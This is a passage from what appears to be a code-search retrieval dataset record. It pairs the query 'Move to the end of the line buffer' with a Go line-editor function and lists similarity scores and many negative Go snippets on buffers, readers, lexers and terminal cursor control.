r\n\tbr.buffered = 0\n\tbr.offset = 0\n\tbr.eof = false\n\tbr.mustFill = false\n}", "func (b *Buffer) Reset() {\n\tb.B = b.B[:0]\n}", "func (d *Display) Line1() *Display {\n\td.sendCommand(0x80)\n\treturn d\n}", "func CursorPrevLine(count int) string {\n\treturn fmt.Sprintf(\"%s%dF\", csi, count)\n}", "func (sbr *smtpBufferedReader) Reset(r io.Reader) {\n\tsbr.alr = newAdjustableLimitedReader(r, CommandLineMaxLength)\n\tsbr.Reader.Reset(sbr.alr)\n}", "func (ls *linestate) editSwap() {\n\tif ls.pos > 0 && ls.pos < len(ls.buf) {\n\t\ttmp := ls.buf[ls.pos-1]\n\t\tls.buf[ls.pos-1] = ls.buf[ls.pos]\n\t\tls.buf[ls.pos] = tmp\n\t\tif ls.pos != len(ls.buf)-1 {\n\t\t\tls.pos++\n\t\t}\n\t\tls.refreshLine()\n\t}\n}", "func (b *Buffer) getCursorMinXPos() int {\n return b.getLineMetaChars() + 1\n}", "func (io *Io) NextLine() string {\n\tif io.nextToken < len(io.tokens) {\n\t\tpanic(\"io.nextToken < len(io.tokens)\")\n\t}\n\n\tvar buffer bytes.Buffer\n\n\tfor {\n\t\tline, isPrefix, err := io.reader.ReadLine()\n\t\tif err != nil {\n\t\t\tpanic(err)\n\t\t}\n\t\tbuffer.Write(line)\n\t\tif !isPrefix {\n\t\t\tbreak\n\t\t}\n\t}\n\n\treturn buffer.String()\n}", "func (v *TextView) ForwardDisplayLine(iter *TextIter) bool {\n\treturn gobool(C.gtk_text_view_forward_display_line(v.native(), iter.native()))\n}", "func newFirstLineReader(r io.Reader) *firstLineReader {\n\tf := &firstLineReader{make(chan string, 1), make(chan error, 1)}\n\tgo func() {\n\t\tif ln, err := bufio.NewReader(r).ReadString('\\n'); err != nil {\n\t\t\tf.ech <- err\n\t\t} else {\n\t\t\tf.sch <- strings.TrimSpace(ln)\n\t\t}\n\t\tio.Copy(ioutil.Discard, r)\n\t}()\n\treturn f\n}" ]
[ "0.6160869", "0.5816958", "0.5776713", "0.5755481", "0.56894267", "0.5604808", "0.5589513", "0.55494845", "0.55149835", "0.55141646", "0.55054355", "0.54670656", "0.54652417", "0.5444559", "0.5405748", "0.53980356", "0.5392492", "0.53920853", "0.5386621", "0.5339732", "0.5339732", "0.5336121", "0.53326744", "0.53325164", "0.5326979", "0.53244066", "0.532032", "0.5317981", "0.52905625", "0.5277483", "0.5272673", "0.52487767", "0.5242434", "0.5241403", "0.5231464", "0.52225626", "0.52216065", "0.5209334", "0.52063996", "0.51915276", "0.5189006", "0.51803106", "0.5180071", "0.5178856", "0.51786757", "0.5175158", "0.516484", "0.51502997", "0.5126964", "0.5119677", "0.5114913", "0.5110327", "0.5107703", "0.5106486", "0.5104842", "0.5101038", "0.5098808", "0.50981104", "0.5097764", "0.5080098", "0.50799114", "0.507518", "0.50651413", "0.5059477", "0.5057326", "0.5040189", "0.5026395", "0.50240314", "0.50238746", "0.50219405", "0.5016433", "0.50035006", "0.5001764", "0.50016665", "0.49987295", "0.4984686", "0.4983608", "0.49792174", "0.4978689", "0.49757183", "0.4967919", "0.49653047", "0.4961977", "0.495801", "0.49543685", "0.49484858", "0.4943914", "0.49371558", "0.49329424", "0.49283636", "0.49274638", "0.49208337", "0.49193805", "0.49118415", "0.49075642", "0.490268", "0.48984364", "0.48887977", "0.4888284", "0.4884334" ]
0.54549706
13
Move to the end of the line buffer.
func (ls *linestate) editMoveEnd() { if ls.pos != len(ls.buf) { ls.pos = len(ls.buf) ls.refreshLine() } }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func (ls *linestate) deleteToEnd() {\n\tls.buf = ls.buf[:ls.pos]\n\tls.refreshLine()\n}", "func ClearLinePartialForward() {\n\temitEscape(\"K\")\n}", "func (i *Input) backspace() {\n\tcurLine := i.lines[i.cursorLineIndex]\n\t// at the beginning of the buffer, nothing to do\n\tif len(curLine) == 0 && i.cursorLineIndex == 0 {\n\t\treturn\n\t}\n\n\t// at the beginning of a line somewhere in the buffer\n\tif i.cursorLinePos == 0 {\n\t\tprevLine := i.lines[i.cursorLineIndex-1]\n\t\t// remove the newline character from the prevline\n\t\tprevLine = prevLine[:len(curLine)-1] + curLine\n\t\ti.lines = append(i.lines[:i.cursorLineIndex], i.lines[i.cursorLineIndex+1:]...)\n\t\ti.cursorLineIndex--\n\t\ti.cursorLinePos = len(prevLine) - 1\n\t\treturn\n\t}\n\n\t// I'm at the end of a line\n\tif i.cursorLinePos == len(curLine)-1 {\n\t\ti.lines[i.cursorLineIndex] = curLine[:len(curLine)-1]\n\t\ti.cursorLinePos--\n\t\treturn\n\t}\n\n\t// I'm in the middle of a line\n\ti.lines[i.cursorLineIndex] = curLine[:i.cursorLinePos-1] + curLine[i.cursorLinePos:]\n\ti.cursorLinePos--\n}", "func (x *Reader) BackToLastCompleteLine() error {\n\tif x.File == nil {\n\t\treturn nil\n\t}\n\treturn x.SeekOffset(x.Offset)\n}", "func (b *Buffer) MoveLinesUp(start int, end int) {\n\t// 0 < start < end <= len(b.lines)\n\tif start < 1 || start >= end || end > len(b.lines) {\n\t\treturn // what to do? FIXME\n\t}\n\tif end == len(b.lines) {\n\t\tb.Insert(\n\t\t\tLoc{\n\t\t\t\tutf8.RuneCount(b.lines[end-1].data),\n\t\t\t\tend - 1,\n\t\t\t},\n\t\t\t\"\\n\"+b.Line(start-1),\n\t\t)\n\t} else {\n\t\tb.Insert(\n\t\t\tLoc{0, end},\n\t\t\tb.Line(start-1)+\"\\n\",\n\t\t)\n\t}\n\tb.Remove(\n\t\tLoc{0, start - 1},\n\t\tLoc{0, start},\n\t)\n}", "func (b *Buffer) MoveLinesDown(start int, end int) {\n\t// 0 <= start < end < len(b.lines)\n\t// if end == len(b.lines), we can't do anything here because the\n\t// last line is unaccessible, FIXME\n\tif start < 0 || start >= end || end >= len(b.lines)-1 {\n\t\treturn // what to do? FIXME\n\t}\n\tb.Insert(\n\t\tLoc{0, start},\n\t\tb.Line(end)+\"\\n\",\n\t)\n\tend++\n\tb.Remove(\n\t\tLoc{0, end},\n\t\tLoc{0, end + 1},\n\t)\n}", "func (p *MultiLineParser) sendLine() {\n\tdefer func() {\n\t\tp.buffer.Reset()\n\t\tp.rawDataLen = 0\n\t}()\n\n\tcontent := make([]byte, p.buffer.Len())\n\tcopy(content, p.buffer.Bytes())\n\tif len(content) > 0 || p.rawDataLen > 0 {\n\t\tp.lineHandler.Handle(NewMessage(content, p.status, p.rawDataLen, p.timestamp))\n\t}\n}", "func ClearLinePartialBackward() {\n\temitEscape(\"K\", 1)\n}", "func (cc *Reader) ReadLine() ([]byte, error) {\n\tfor {\n\t\t// try to find a terminated line in the buffered data already read\n\t\tnlidx := bytes.IndexByte(cc.buf[cc.searchFrom:cc.end], '\\n')\n\t\tif nlidx != -1 {\n\t\t\t// got a complete line\n\t\t\tline := cc.buf[cc.start : cc.searchFrom+nlidx]\n\t\t\tcc.start = cc.searchFrom + nlidx + 1\n\t\t\tcc.searchFrom = cc.start\n\t\t\t// treat \\r\\n as the line terminator if it was present\n\t\t\tif 0 < len(line) && line[len(line)-1] == '\\r' {\n\t\t\t\tline = line[:len(line)-1]\n\t\t\t}\n\t\t\treturn line, nil\n\t\t}\n\n\t\t// are we out of space? we can read more if any of these are true:\n\t\t// 1. cc.start != 0, so we can slide the existing data back\n\t\t// 2. cc.end < len(cc.buf), so we can read data into the end of the buffer\n\t\t// 3. len(cc.buf) < cc.maxSize, so we can grow the buffer\n\t\tif cc.start == 0 && cc.end == len(cc.buf) && len(cc.buf) == cc.maxSize {\n\t\t\treturn nil, ErrReadQ\n\t\t}\n\n\t\tif cc.eof {\n\t\t\treturn nil, io.EOF\n\t\t}\n\n\t\tif len(cc.buf) < cc.maxSize && (len(cc.buf)-(cc.end-cc.start) < cc.initialSize/2) {\n\t\t\t// allocate a new buffer, copy any remaining data\n\t\t\tnewLen := roundUpToPowerOfTwo(len(cc.buf) + 1)\n\t\t\tif newLen > cc.maxSize {\n\t\t\t\tnewLen = cc.maxSize\n\t\t\t} else if newLen < cc.initialSize {\n\t\t\t\tnewLen = cc.initialSize\n\t\t\t}\n\t\t\tnewBuf := make([]byte, newLen)\n\t\t\tcopy(newBuf, cc.buf[cc.start:cc.end])\n\t\t\tcc.buf = newBuf\n\t\t} else if cc.start != 0 {\n\t\t\t// slide remaining data back to the front of the buffer\n\t\t\tcopy(cc.buf, cc.buf[cc.start:cc.end])\n\t\t}\n\t\tcc.end = cc.end - cc.start\n\t\tcc.start = 0\n\n\t\tcc.searchFrom = cc.end\n\t\tn, err := cc.conn.Read(cc.buf[cc.end:])\n\t\tcc.end += n\n\t\tif n != 0 && err == io.EOF {\n\t\t\t// we may have received new \\n-terminated lines, try to parse them\n\t\t\tcc.eof = true\n\t\t} else if err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t}\n}", "func (tv *TextView) CursorEndLine() {\n\twupdt := tv.TopUpdateStart()\n\tdefer tv.TopUpdateEnd(wupdt)\n\ttv.ValidateCursor()\n\torg := tv.CursorPos\n\tpos := tv.CursorPos\n\n\tgotwrap := false\n\tif wln := tv.WrappedLines(pos.Ln); wln > 1 {\n\t\tsi, ri, _ := tv.WrappedLineNo(pos)\n\t\tri = len(tv.Renders[pos.Ln].Spans[si].Text) - 1\n\t\tnwc, _ := tv.Renders[pos.Ln].SpanPosToRuneIdx(si, ri)\n\t\tif si == len(tv.Renders[pos.Ln].Spans)-1 { // last span\n\t\t\tri++\n\t\t\tnwc++\n\t\t}\n\t\ttv.CursorCol = ri\n\t\tpos.Ch = nwc\n\t\ttv.CursorPos = pos\n\t\tgotwrap = true\n\t}\n\tif !gotwrap {\n\t\ttv.CursorPos.Ch = tv.Buf.LineLen(tv.CursorPos.Ln)\n\t\ttv.CursorCol = tv.CursorPos.Ch\n\t}\n\ttv.SetCursor(tv.CursorPos)\n\ttv.ScrollCursorToRight()\n\ttv.RenderCursor(true)\n\ttv.CursorSelect(org)\n}", "func (b *Buffer) Reset() {\n\tb.Line = b.Line[:0]\n\tb.Val = b.Val[:0]\n}", "func (lexer *Lexer) nextLine() {\n lexer.position.Col = 0\n lexer.position.Row++\n}", "func (ls *linestate) editBackspace() {\n\tif ls.pos > 0 && len(ls.buf) > 0 {\n\t\tls.buf = append(ls.buf[:ls.pos-1], ls.buf[ls.pos:]...)\n\t\tls.pos--\n\t\tls.refreshLine()\n\t}\n}", "func nl(b *bytes.Buffer) {\n\tbuf := b.Bytes()\n\tif len(buf) == 0 || buf[len(buf)-1] == '\\n' {\n\t\treturn\n\t}\n\ti := len(buf)\n\tfor i > 0 && buf[i-1] == ' ' {\n\t\ti--\n\t}\n\tif i < len(buf) {\n\t\tb.Truncate(i)\n\t}\n\tb.WriteByte('\\n')\n}", "func ClearLineEnd() {\n\tfmt.Printf(\"\\033[0K\")\n}", "func ClearLineEnd() {\n\tfmt.Printf(\"\\033[0K\")\n}", "func (ls *linestate) completeLine() rune {\n\t// get a list of line completions\n\tlc := ls.ts.completionCallback(ls.String())\n\tif len(lc) == 0 {\n\t\t// no line completions\n\t\tbeep()\n\t\treturn KeycodeNull\n\t}\n\t// navigate and display the line completions\n\tstop := false\n\tidx := 0\n\tu := utf8{}\n\tvar r rune\n\tfor !stop {\n\t\tif idx < len(lc) {\n\t\t\t// save the line buffer\n\t\t\tsavedBuf := ls.buf\n\t\t\tsavedPos := ls.pos\n\t\t\t// show the completion\n\t\t\tls.buf = []rune(lc[idx])\n\t\t\tls.pos = len(ls.buf)\n\t\t\tls.refreshLine()\n\t\t\t// restore the line buffer\n\t\t\tls.buf = savedBuf\n\t\t\tls.pos = savedPos\n\t\t} else {\n\t\t\t// show the original buffer\n\t\t\tls.refreshLine()\n\t\t}\n\t\t// navigate through the completions\n\t\tr = u.getRune(ls.ifd, nil)\n\t\tif r == KeycodeNull {\n\t\t\t// error on read\n\t\t\tstop = true\n\t\t} else if r == KeycodeTAB {\n\t\t\t// loop through the completions\n\t\t\tidx = (idx + 1) % (len(lc) + 1)\n\t\t\tif idx == len(lc) {\n\t\t\t\tbeep()\n\t\t\t}\n\t\t} else if r == KeycodeESC {\n\t\t\t// could be an escape, could be an escape sequence\n\t\t\tif wouldBlock(ls.ifd, &timeout20ms) {\n\t\t\t\t// nothing more to read, looks like a single escape\n\t\t\t\t// re-show the original buffer\n\t\t\t\tif idx < len(lc) {\n\t\t\t\t\tls.refreshLine()\n\t\t\t\t}\n\t\t\t\t// don't pass the escape key back\n\t\t\t\tr = KeycodeNull\n\t\t\t} else {\n\t\t\t\t// probably an escape sequence\n\t\t\t\t// update the buffer and return\n\t\t\t\tif idx < len(lc) {\n\t\t\t\t\tls.buf = []rune(lc[idx])\n\t\t\t\t\tls.pos = len(ls.buf)\n\t\t\t\t}\n\t\t\t}\n\t\t\tstop = true\n\t\t} else {\n\t\t\t// update the buffer and return\n\t\t\tif idx < len(lc) {\n\t\t\t\tls.buf = []rune(lc[idx])\n\t\t\t\tls.pos = len(ls.buf)\n\t\t\t}\n\t\t\tstop = true\n\t\t}\n\t}\n\t// return the last rune read\n\treturn r\n}", "func (t *tui) end(g *gotui.Gui, v *gotui.View) error {\n\t_, cy := v.Cursor()\n\tlines := v.ViewBufferLines()\n\t// Return if we're on a line with zero width.\n\tif len(lines) == 0 || len(lines[cy]) == 0 {\n\t\treturn nil\n\t}\n\t// Set the last column to either the width of the view or one character after the last.\n\tlastCol, _ := v.Size()\n\tif len(lines[cy]) < lastCol {\n\t\tlastCol = len(lines[cy]) + 1\n\t}\n\tv.SetCursor(lastCol-1, cy)\n\treturn nil\n}", "func (b *Buffer) update() {\n\tb.NumLines = len(b.lines)\n}", "func (lbw *LineBufferingWriter) Flush() error {\n\tlbw.bufferLock.Lock()\n\tdefer lbw.bufferLock.Unlock()\n\tif len(lbw.buf) == 0 {\n\t\treturn nil\n\t}\n\n\t_, err := lbw.wrappedWriter.Write(lbw.buf)\n\tif err != nil {\n\t\treturn err\n\t}\n\tlbw.buf = []byte{}\n\treturn nil\n}", "func (lx *lexer) backup() {\r\n\tlx.pos -= lx.width\r\n\tif lx.pos < len(lx.input) && lx.input[lx.pos] == '\\n' {\r\n\t\tlx.line--\r\n\t}\r\n}", "func (b *Buffer) End() Loc {\n\treturn Loc{utf8.RuneCount(b.lines[b.NumLines-1].data), b.NumLines - 1}\n}", "func (l *lexer) backup() {\r\n\tl.pos -= l.width\r\n\r\n\tif l.width == 1 && l.input[l.pos] == '\\n' {\r\n\t\tl.line--\r\n\t}\r\n}", "func (e *Editor) Line() (string, error) {\n\tif err := e.editReset(); err != nil {\n\t\treturn string(e.Buffer), err\n\t}\nline:\n\tfor {\n\t\tr, _, err := e.In.ReadRune()\n\t\tif err != nil {\n\t\t\treturn string(e.Buffer), err\n\t\t}\n\n\t\tswitch r {\n\t\tcase enter:\n\t\t\tbreak line\n\t\tcase ctrlC:\n\t\t\treturn string(e.Buffer), errors.New(\"try again\")\n\t\tcase backspace, ctrlH:\n\t\t\tif err := e.editBackspace(); err != nil {\n\t\t\t\treturn string(e.Buffer), err\n\t\t\t}\n\t\tcase ctrlD:\n\t\t\tif len(e.Buffer) == 0 {\n\t\t\t\treturn string(e.Buffer), io.EOF\n\t\t\t}\n\n\t\t\tif err := e.editDelete(); err != nil {\n\t\t\t\treturn string(e.Buffer), err\n\t\t\t}\n\t\tcase ctrlT:\n\t\t\tif err := e.editSwap(); err != nil {\n\t\t\t\treturn string(e.Buffer), err\n\t\t\t}\n\t\tcase ctrlB:\n\t\t\tif err := e.editMoveLeft(); err != nil {\n\t\t\t\treturn string(e.Buffer), err\n\t\t\t}\n\t\tcase ctrlF:\n\t\t\tif err := e.editMoveRight(); err != nil {\n\t\t\t\treturn string(e.Buffer), err\n\t\t\t}\n\t\tcase ctrlP:\n\t\t\tif err := e.editHistoryPrev(); err != nil {\n\t\t\t\treturn string(e.Buffer), err\n\t\t\t}\n\t\tcase ctrlN:\n\t\t\tif err := e.editHistoryNext(); err != nil {\n\t\t\t\treturn string(e.Buffer), err\n\t\t\t}\n\t\tcase ctrlU:\n\t\t\tif err := e.editReset(); err != nil {\n\t\t\t\treturn string(e.Buffer), err\n\t\t\t}\n\t\tcase ctrlK:\n\t\t\tif err := e.editKillForward(); err != nil {\n\t\t\t\treturn string(e.Buffer), err\n\t\t\t}\n\t\tcase ctrlA:\n\t\t\tif err := e.editMoveHome(); err != nil {\n\t\t\t\treturn string(e.Buffer), err\n\t\t\t}\n\t\tcase ctrlE:\n\t\t\tif err := e.editMoveEnd(); err != nil {\n\t\t\t\treturn string(e.Buffer), err\n\t\t\t}\n\t\tcase ctrlL:\n\t\t\tif err := e.clearScreen(); err != nil {\n\t\t\t\treturn string(e.Buffer), err\n\t\t\t}\n\n\t\t\tif err := e.refreshLine(); err != nil {\n\t\t\t\treturn string(e.Buffer), err\n\t\t\t}\n\t\tcase ctrlW:\n\t\t\tif err := e.editDeletePrevWord(); err != nil {\n\t\t\t\treturn string(e.Buffer), err\n\t\t\t}\n\t\tcase esc:\n\t\t\tr, _, err := e.In.ReadRune()\n\t\t\tif err != nil {\n\t\t\t\treturn string(e.Buffer), err\n\t\t\t}\n\n\t\t\tswitch r {\n\t\t\tcase '[':\n\t\t\t\tr, _, err := e.In.ReadRune()\n\t\t\t\tif err != nil {\n\t\t\t\t\treturn string(e.Buffer), err\n\t\t\t\t}\n\n\t\t\t\tswitch r {\n\t\t\t\tcase '0', '1', '2', '4', '5', '6', '7', '8', '9':\n\t\t\t\t\t_, _, err := e.In.ReadRune()\n\t\t\t\t\tif err != nil {\n\t\t\t\t\t\treturn string(e.Buffer), err\n\t\t\t\t\t}\n\t\t\t\tcase '3':\n\t\t\t\t\tr, _, err := e.In.ReadRune()\n\t\t\t\t\tif err != nil {\n\t\t\t\t\t\treturn string(e.Buffer), err\n\t\t\t\t\t}\n\n\t\t\t\t\tswitch r {\n\t\t\t\t\tcase '~':\n\t\t\t\t\t\tif err := e.editDelete(); err != nil {\n\t\t\t\t\t\t\treturn string(e.Buffer), err\n\t\t\t\t\t\t}\n\t\t\t\t\t}\n\t\t\t\tcase 'A':\n\t\t\t\t\tif err := e.editHistoryPrev(); err != nil {\n\t\t\t\t\t\treturn string(e.Buffer), err\n\t\t\t\t\t}\n\t\t\t\tcase 'B':\n\t\t\t\t\tif err := e.editHistoryNext(); err != nil {\n\t\t\t\t\t\treturn string(e.Buffer), err\n\t\t\t\t\t}\n\t\t\t\tcase 'C':\n\t\t\t\t\tif err := e.editMoveRight(); err != nil {\n\t\t\t\t\t\treturn string(e.Buffer), err\n\t\t\t\t\t}\n\t\t\t\tcase 'D':\n\t\t\t\t\tif err := e.editMoveLeft(); err != nil {\n\t\t\t\t\t\treturn string(e.Buffer), err\n\t\t\t\t\t}\n\t\t\t\tcase 'H':\n\t\t\t\t\tif err := e.editMoveHome(); err != nil {\n\t\t\t\t\t\treturn string(e.Buffer), err\n\t\t\t\t\t}\n\t\t\t\tcase 'F':\n\t\t\t\t\tif err := e.editMoveEnd(); err != nil {\n\t\t\t\t\t\treturn string(e.Buffer), err\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\tcase 'O':\n\t\t\t\tr, _, err := e.In.ReadRune()\n\t\t\t\tif err != nil {\n\t\t\t\t\treturn string(e.Buffer), err\n\t\t\t\t}\n\n\t\t\t\tswitch r {\n\t\t\t\tcase 'H':\n\t\t\t\t\tif err := e.editMoveHome(); err != nil {\n\t\t\t\t\t\treturn string(e.Buffer), err\n\t\t\t\t\t}\n\t\t\t\tcase 'F':\n\t\t\t\t\tif err := e.editMoveEnd(); err != nil {\n\t\t\t\t\t\treturn string(e.Buffer), err\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}\n\t\tcase tab:\n\t\t\tif err := e.completeLine(); err != nil {\n\t\t\t\treturn string(e.Buffer), err\n\t\t\t}\n\t\tdefault:\n\t\t\tif err := e.editInsert(r); err != nil {\n\t\t\t\treturn string(e.Buffer), err\n\t\t\t}\n\t\t}\n\t}\n\n\treturn string(e.Buffer), nil\n}", "func (rd *Reader) Forget() {\n\tn := copy(rd.buffer, rd.buffer[rd.current:])\n\trd.current = 0\n\trd.buffer = rd.buffer[:n]\n}", "func ClearLine() {\n\temitEscape(\"K\", 2)\n}", "func CursorNextLine(r uint) {\n\temitEscape(\"E\", r)\n}", "func (w *writer) addLine(p []byte) error {\n\tw.lines = CopyAndAppend(w.lines, p)\n\n\tif len(w.lines) >= ItemsPerMessage {\n\t\treturn w.flush()\n\t}\n\n\treturn nil\n}", "func (ls *linestate) editMoveRight() {\n\tif ls.pos != len(ls.buf) {\n\t\tls.pos++\n\t\tls.refreshLine()\n\t}\n}", "func (r *Render) BreakLine(buffer *Buffer) {\n\t// Erasing and Render\n\tcursor := runewidth.StringWidth(buffer.Document().TextBeforeCursor()) + runewidth.StringWidth(r.getCurrentPrefix())\n\tr.clear(cursor)\n\tr.renderPrefix()\n\tr.out.SetColor(r.inputTextColor, r.inputBGColor, false)\n\tr.out.WriteStr(buffer.Document().Text + \"\\n\")\n\tr.out.SetColor(DefaultColor, DefaultColor, false)\n\tdebug.AssertNoError(r.out.Flush())\n\tif r.breakLineCallback != nil {\n\t\tr.breakLineCallback(buffer.Document())\n\t}\n\n\tr.previousCursor = 0\n}", "func (lx *Lexer) lineTerminator(r rune) {\n\tif r == '\\n' {\n\t\tlx.pos.Column = 0\n\t\tlx.pos.Linum += 1\n\t\tlx.rawPos = lx.pos\n\t} else if r == '\\r' {\n\t\tn, _ := lx.nextChar()\n\t\tif n != '\\n' {\n\t\t\tpanic(lx.errf(\"Invalid line endings, expected to be LF or CRLF but only got CR.\"))\n\t\t} else {\n\t\t\t//recurse to increment line number\n\t\t\tlx.lineTerminator(n)\n\t\t}\n\t}\n}", "func (w *VT100Writer) EraseEndOfLine() {\n\tw.WriteRaw([]byte{0x1b, '[', 'K'})\n}", "func (v *TextView) ForwardDisplayLineEnd(iter *TextIter) bool {\n\treturn gobool(C.gtk_text_view_forward_display_line_end(v.native(), iter.native()))\n}", "func (p *Buffer) Rewind() {\n\tp.index = 0\n}", "func EndLine() string {\n\treturn \"\\n\"\n}", "func endPosInBuffer(env *Env, name string) fake.Pos {\n\tbuffer := env.Editor.BufferText(name)\n\tlines := strings.Split(buffer, \"\\n\")\n\tnumLines := len(lines)\n\n\treturn fake.Pos{\n\t\tLine: numLines - 1,\n\t\tColumn: len([]rune(lines[numLines-1])),\n\t}\n}", "func (e *ObservableEditableBuffer) End() OffsetTuple {\n\treturn e.f.End()\n}", "func (tr *testTalker) putLine(line string) {\n\ttr.output = append(tr.output, line)\n}", "func (fm *FieldModelOrder) SetEnd(fbeBegin int) {\n fm.buffer.Unshift(fbeBegin)\n}", "func (c *Cursor) Last() {\n\tc.pos = c.end - 1\n}", "func (sbr *smtpBufferedReader) Reset(r io.Reader) {\n\tsbr.alr = newAdjustableLimitedReader(r, CommandLineMaxLength)\n\tsbr.Reader.Reset(sbr.alr)\n}", "func (b *buffer) Line(content string, indent int) {\n\tb.Write(fmt.Sprintf(\"%s\\n\", content), indent)\n}", "func (m *Music) WaitLine() {\n\t<-m.linePlayed\n}", "func (q *Queue) MoveToEnd(key string) {\n\tq.Delete(key)\n\tq.Push(key)\n}", "func (l *lexer) reset() {\n\tl.line -= strings.Count(l.input[l.start:l.pos], \"\\n\")\n\tl.pos = l.start\n}", "func Buffer() string {\n\treturn C.GoString(C.rl_line_buffer)\n}", "func (cur *cursor) invalidateAtEnd() {\n\tcur.idx = int(cur.nd.count)\n}", "func (b *Buffer) Line(n int) string {\n\tif n >= len(b.lines) {\n\t\treturn \"\"\n\t}\n\treturn string(b.lines[n].data)\n}", "func (r *ride) unshiftLines() Line {\n\tline, lines := r.lines[0], r.lines[1:]\n\tr.lines = lines\n\treturn line\n}", "func (hw *HighlightedWriter) EraseEndOfLine() {\n\thw.delegate.EraseEndOfLine()\n}", "func (ls *linestate) refreshLine() {\n\tif ls.ts.mlmode {\n\t\tls.refreshMultiline()\n\t} else {\n\t\tls.refreshSingleline()\n\t}\n}", "func (l *lexer) backup() {\n\tl.pos -= l.width\n\t// Correct newline count.\n\tif l.width == 1 && l.input[l.pos] == '\\n' {\n\t\tl.line--\n\t}\n}", "func (l *lexer) backup() {\n\tl.pos--\n\t// Correct newline count.\n\tif l.input[l.pos] == '\\n' {\n\t\tl.line--\n\t}\n}", "func (p *Parser) SkipToEndOfLine() {\n\tp.lex.skipToNewline()\n}", "func (b *buffer) Flush() string {\n\treturn strings.Join(b.lines, \"\")\n}", "func (tb *TextBuf) EndPos() TextPos {\n\ttb.LinesMu.RLock()\n\tdefer tb.LinesMu.RUnlock()\n\n\tif tb.NLines == 0 {\n\t\treturn TextPosZero\n\t}\n\ted := TextPos{tb.NLines - 1, len(tb.Lines[tb.NLines-1])}\n\treturn ed\n}", "func (t *Terminal) updateBuffer() {\n\tcopy(termbox.CellBuffer(), t.buffer)\n\tif err := termbox.Flush(); err != nil {\n\t\tlog.Fatal(err)\n\t}\n}", "func (b *Buffer) Reset() {\n\tb.buf = b.buf[:0]\n}", "func advanceBuffer(buff *bytes.Buffer, num int) {\n\tbuff.Next(num)\n\t// move buffer from num offset to 0\n\tbytearr := buff.Bytes()\n\tbuff.Reset()\n\tbuff.Write(bytearr)\n}", "func (e *LineEditor) CursorEnd() {\n\te.Cx = len(e.Row)\n}", "func (l *StringLexer) Backup() {\n\tl.pos -= l.width\n\tif l.width == 1 && l.pos >= 0 && l.inputLen() > l.pos {\n\t\tif l.input[l.pos] == '\\n' {\n\t\t\tl.line--\n\t\t}\n\t}\n}", "func (b *Buf) Reset() { b.b = b.b[:0] }", "func RewindLines(n int) {\n\tfor i := 0; i < n; i++ {\n\t\tfmt.Printf(\"\\033[1A\\033[K\")\n\t}\n}", "func (t *TimeLine) Reset() {\n\tt.cursor = 0\n\tt.lastDelta = 0\n}", "func (buf *RespBuffer) End() {\n\tbuf.end <- struct{}{}\n\tclose(buf.end)\n}", "func (w *withoutNinjaExplain) Flush() error {\n\tfor {\n\t\tline, err := w.buf.ReadBytes('\\n')\n\t\tif err != nil && !errors.Is(err, io.EOF) {\n\t\t\treturn err\n\t\t}\n\t\tif !explainRegex.MatchString(string(line)) {\n\t\t\tw.w.Write(line)\n\t\t}\n\t\t// The last line may not finish with a '\\n', so handle it before breaking.\n\t\tif errors.Is(err, io.EOF) {\n\t\t\tbreak\n\t\t}\n\t}\n\treturn nil\n}", "func (w *IPWriter) SetCurrentLine(n uint) {\n\tw.currentLine = n\n}", "func (d *Decoder) consumeLine() {\n\td.take(notNewline)\n\tif d.at(0) == '\\n' {\n\t\td.advance(1)\n\t\td.line++\n\t}\n\td.reset()\n\td.section = endSection\n}", "func (i *Input) Clear() {\n\ti.Pos = 0\n\ti.Buffer = NewLine()\n}", "func (e *ExportReader) readLine() ([]byte, error) {\n\tline, err := e.buf.ReadBytes('\\n')\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\t// trim the trailing newline\n\treturn line[:len(line)-1], nil\n}", "func (ww *Writer) newline() (int, error) {\n\tdebug(\"newline\\n\")\n\n\tb := ww.lb.Bytes()\n\tif l := len(b); l > 0 && b[l-1] == ' ' {\n\t\tww.lb.Truncate(l - 1) // remove final space character from line buffer.\n\t}\n\n\tif _, err := ww.lb.WriteRune('\\n'); err != nil {\n\t\treturn 0, err\n\t}\n\n\t// After newline written, the entire line length is available.\n\tww.remaining = ww.max\n\n\t// Because this library is meant to be line based, go ahead and flush the\n\t// contents of the line buffer after each newline.\n\tnw, err := ww.flush()\n\tif err != nil {\n\t\treturn nw, err\n\t}\n\n\treturn nw, ww.writePrefix()\n}", "func (i *Input) Backspace() {\n\tif i.Pos > 0 {\n\t\ti.Buffer.RemoveRune(i.Pos - 1)\n\t\ti.Pos--\n\t}\n}", "func (h *windowsAnsiEventHandler) scrollLine(columns int, position COORD, info *CONSOLE_SCREEN_BUFFER_INFO) error {\n\t// Copy from and clip to the scroll region (full buffer width)\n\tscrollRect := SMALL_RECT{\n\t\tTop: position.Y,\n\t\tBottom: position.Y,\n\t\tLeft: position.X,\n\t\tRight: info.Size.X - 1,\n\t}\n\n\t// Origin to which area should be copied\n\tdestOrigin := COORD{\n\t\tX: position.X - int16(columns),\n\t\tY: position.Y,\n\t}\n\n\tchar := CHAR_INFO{\n\t\tUnicodeChar: ' ',\n\t\tAttributes: h.attributes,\n\t}\n\n\tif err := ScrollConsoleScreenBuffer(h.fd, scrollRect, scrollRect, destOrigin, char); err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func (b *Buffer) Reset() {\n\tb.writeCursor = 0\n\tb.written = 0\n}", "func (file *File) SeekLine(lines int64, whence int) (int64, error) {\n\n\t// return error on bad whence\n\tif whence < 0 || whence > 2 {\n\t\treturn file.Seek(0, whence)\n\t}\n\n\tposition, err := file.Seek(0, whence)\n\n\tbuf := make([]byte, BufferLength)\n\tbufLen := 0\n\tlineSep := byte('\\n')\n\tseekBack := lines < 1\n\tlines = int64(math.Abs(float64(lines)))\n\tmatchCount := int64(0)\n\n\t// seekBack ignores first match\n\t// allows 0 to go to begining of current line\n\tif seekBack {\n\t\tmatchCount = -1\n\t}\n\n\tleftPosition := position\n\toffset := int64(BufferLength * -1)\n\n\tfor b := 1; ; b++ {\n\t\tif err != nil {\n\t\t\tbreak\n\t\t}\n\n\t\tif seekBack {\n\n\t\t\t// on seekBack 2nd buffer onward needs to seek\n\t\t\t// past what was just read plus another buffer size\n\t\t\tif b == 2 {\n\t\t\t\toffset *= 2\n\t\t\t}\n\n\t\t\t// if next seekBack will pass beginning of file\n\t\t\t// buffer is 0 to 